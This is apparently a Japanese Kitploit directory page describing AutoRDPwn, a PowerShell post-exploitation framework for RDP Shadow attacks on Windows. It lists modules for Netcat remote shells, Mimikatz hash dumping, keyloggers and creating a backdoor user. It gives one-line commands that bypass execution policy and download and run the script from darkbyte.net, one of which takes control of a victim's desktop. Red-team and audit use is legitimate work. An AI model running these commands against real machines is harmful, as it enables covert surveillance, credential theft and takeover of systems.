Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
AutoRDPwn — The Shadow Attack Framework | Kitploit
ツール/GitHubGitHub/joelgmsec/autordpwn
パスワードクラッキング特権昇格ペイロード生成横移動ポストエクスプロイトペネトレーションテストレッドチーミングリモートアクセスツール
GitHubjoelgmsec/autordpwn

AutoRDPwn

The Shadow Attack Framework

リポジトリを見る
1.1k499154年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

AutoRDPwn

AutoRDPwn は Powershell で作成されたポストエクスプロイテーションフレームワークで、主に Microsoft Windows コンピュータに対する Shadow 攻撃を自動化するために設計されています。この脆弱性(Microsoft によって機能としてリストされています)により、リモートの攻撃者は、被害者の同意なしにデスクトップを表示し、必要に応じてオペレーティングシステム自体のネイティブツールを使用して制御することもできます。

追加モジュールのおかげで、Netcat を介したリモートシェルの取得、Mimikatz によるシステムハッシュのダンプ、リモートキーロガーのロードなどが可能です。これらすべてが、7つの異なる言語に対応した完全に直感的なメニューを通じて行えます。

さらに、使用方法のセクションで説明されている一連のパラメータを使用して、リバースシェルで使用することも可能です。

必要条件

Powershell 4.0 以上

変更点

バージョン 5.1

• 多くのバグを修正

• 美的改善と待機時間の改善

• システム設定によるプロキシ対応接続

• .zip ファイルをダウンロードしてオフラインツールを使用することが可能になりました

• Enter キーを押すことで言語を自動検出

• Invoke-DCOM が SharpRDP に置き換えられました

• PowerUp が Invoke-PrivescCheck に置き換えられました

• 被害者側の自動クリーンアップサブルーチンの作成

• 新しいモジュール利用可能: AES で暗号化された SMB シェル

• 新しいモジュール利用可能: RunAs でユーザーを変更

*その他の変更は CHANGELOG ファイルをご覧ください

使用方法

このアプリケーションは、ローカル、リモート、またはチーム間のピボットに使用できます。

リバースシェルでリモート使用する場合、以下のパラメータを使用する必要があります。

パラメータ説明
-admin / -noadmin持っている権限に応じて、どちらかを使用します
-noguiこれによりメニューと一部の色の読み込みを回避し、機能を保証します
-lang言語を選択します(英語、スペイン語、フランス語、ドイツ語、イタリア語、ロシア語、ポルトガル語)
-optionメニューと同様に、攻撃の起動方法を選択できます
-shadowリモートデバイスを表示するか制御するかを決定します
-createuserこのパラメータはオプションで、被害者マシンにユーザー AutoRDPwn:AutoRDPwn が作成されます
-noclean被害者コンピュータ上のすべての変更を元に戻すプロセスを無効にします

1行でのローカル実行:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

1行でのリモート実行の例:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

詳細な使用ガイドは以下のリンクにあります:

https://darkbyte.net/autordpwn-la-guia-definitiva

スクリーンショット

AutoRDPwn1_en AutoRDPwn2_en

ライセンス

このプロジェクトは GNU 3.0 ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

クレジットと謝辞

このフレームワークは Joel Gámez Molina // @JoelGMSec によって一から作成・設計されました。

一部のモジュールはサードパーティのコード、スクリプト、ツールを使用しています。特に:

• Chachi-Enumerator by Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m by Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash by Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz by Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec by Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper by Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP by Steven F --> https://github.com/0xthirteen/SharpRDP

そして、ここに収まらない多くのものがあります... すべての皆様とその素晴らしい仕事に感謝します。

連絡先

このソフトウェアはいかなる保証も提供しません。その使用は教育環境、および/またはクライアントの対応する同意を得たセキュリティ監査に限定されます。私はその誤用またはそれによって引き起こされる可能性のある損害について責任を負いません。

詳細については、Twitter @JoelGMSec またはブログ darkbyte.net で見つけることができます。

サポート

あなたは私にコーヒーを買って私の仕事を支援できます:

buymeacoffe

ツールをダウンロード